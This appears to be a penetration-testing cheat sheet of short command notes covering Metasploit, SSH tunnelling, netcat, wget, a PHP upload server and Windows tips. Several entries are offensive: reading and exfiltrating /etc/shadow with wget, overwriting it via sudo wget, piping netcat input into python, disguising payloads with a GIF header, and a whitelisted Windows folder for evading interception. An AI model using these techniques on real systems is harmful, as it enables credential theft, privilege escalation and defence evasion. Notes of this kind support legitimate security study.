Table of Contents

• General
• Linux
  • Metasploit
  • Port Forwarding
  • Sed
  • Less
  • SSH
  • SSH Tunnel
  • Bash
  • NetCat
  • Nmap
  • Wget
  • PHP File Upload Script and Web Server
• Tcpdump
• Windows
• Burp Suite

General

• Put GIF8; on top of payload to make it a GIT image file type.

Linux

Metasploit

Import xml to database.

nmap -Pn -sS -A -oX Subnet1 192.168.1.0/24

msf > db_connect postgres:toor@127.0.0.1/msf3
msf > db_import Subnet1.xml
msf > db_hosts -c address
Hosts
=====
address
-------
192.168.1.1
192.168.1.10
192.168.1.101
192.168.1.102
192.168.1.109
192.168.1.116
192.168.1.142
192.168.1.152
192.168.1.154
192.168.1.171
192.168.1.155
192.168.1.174
192.168.1.180
192.168.1.181
192.168.1.2
192.168.1.99
msf >

Port Forwarding

In ssh, type

~C

And you'll go into SSH interactive mode.

Then

-L 9905:127.0.0.1:6666

And, use following command to cancel it.

~C

-KL 9905

Sed

# change some text to other things (tab here)
sed 's/<text>/\t/g'

Less

# disable word wrap
less -S

SSH

If encounter key algorithm error, just use the following

ssh -okexAlgorithms=+diffie-hellman-gourp1-sha1

SSH Tunnel

# run all traffic to 9000 through tun-remote-ip to bypass maybe blacklist
ssh -i key -L9000:remote-ip:port tun-remote-ip

# or, run all traffic through socks proxy locahost:1080
ssh -D1080 remote-ip-you-have-access

# listen on local port and run all traffic to remote port through ssh
# forward traffic to local port 9901 and 9002 to remote host's 127.0.0.1 port 5801 and 5901
ssh -L9001:127.0.0.1:5801 -L9002:127.0.0.1:5901 user@host

Bash

Environment variable can be sliced like string in python (linux, not BSD)

x=abc
echo $x # abc
echo ${x:1:1} #b

In Linux, printf '\x41' prints 'A', but in BSD it prints 'x41'

NetCat

# pipe something to nc and when someone connects the file just get sent
nc ip port < file

# other side, connect and pipe to whatever program like python
nc ip port | python

Nmap

Bootstrap nmap xml result to a beautiful web page.

https://raw.githubusercontent.com/honze-net/nmap-bootstrap-xsl/master/nmap-bootstrap.xsl

nmap ... --stylesheet <path-to-xsl>

Wget

# read any file you have permission to
wget -i /etc/shadow

# upload file
wget --post-file=FILE <host>:<port>/upload.php?filename=<FILE-NAME>

# create a .ssh folder locally, generate a key pair, mv id_rsa.pub to authorized_keys, and use wget to mirror the folder to target
wget -P /root/ -nH -m <ip>:<port>

PHP File Upload Script and Web Server

If you have a user shell which has the permission to read the /etc/shadow file, just upload the file to your local machine, change the hash to something you want, and re-download it. Like with the wget command. User has sudo permission to use wget, so you can upload /etc/shadow with wget, and redownload it to /etc/shadow to override the former file content.

# php upload file script
<?php
$fname = basename($_REQUEST['filename']);
file_put_contents('upload/', $fname, file_get_contents('php://input'));
?>

# umask 555 to make the folder only writable but not readable to anyone else
mkdir upload; chmod 222 upload

# start php web server
php -S <ip>:<port> -t .

Tcpdump

Check if a server we own is reponding, run the command, and execute a ping on the target, if succeed, icmp request will be captured by tcpdump

 tcpdump -nnvXSs 0 -c2 icmp

Windows

# system white list system32 folder, put .exe here to avoid being intercepted
C:\Windows\System32\spool\drivers\color

Burp Suite

In Proxy -> Options -> Match and Replace, you can add request headers to be applied to each request.

Open Source Web App

Download the open source web app. Search for version string in the source files, and get the file that contains the version string.

grep -R <version> . | awk -F: '{print $1}' | uniq

Then, take the file name to the browser to see what the server responds. May find file inclusion as well.